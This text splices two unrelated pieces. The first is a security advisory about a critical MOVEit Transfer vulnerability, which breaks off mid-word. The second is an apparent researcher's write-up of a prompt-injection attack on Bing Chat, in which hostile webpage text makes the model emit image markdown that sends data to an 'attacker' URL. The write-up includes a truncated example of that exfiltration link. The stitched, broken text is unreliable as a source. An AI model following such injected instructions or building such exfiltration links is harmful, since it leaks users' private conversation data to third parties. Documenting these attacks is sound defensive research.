Summary
Progress, the vendor that provides MOVEit, has disclosed a new, critical vulnerability in its MOVEit file transfer program.
Threat Type
Vulnerability
Overview
***UPDATE #1 - June 19, 2023***
Progress has released an update to their original advisory. The vulnerability has been assigned CVE-2023-35708 and a patch has been made available. See the updated advisory here for additional information.
Original Post
A new privilege escalation and unauthorized access vulnerability in Progress’ MOVEit Tran
This post describes how I found a Prompt Injection attack angle in Bing Chat that allowed malicious text on a webpage (like a user comment or an advertisement) to exfiltrate data.
The Vulnerability - Image Markdown Injection When Bing Chat returns text it can return markdown elements, which the client will render as HTML. This includes the feature to include images.
Imagine the LLM returns the following text:
![data exfiltration in progress](https://attacker/logo.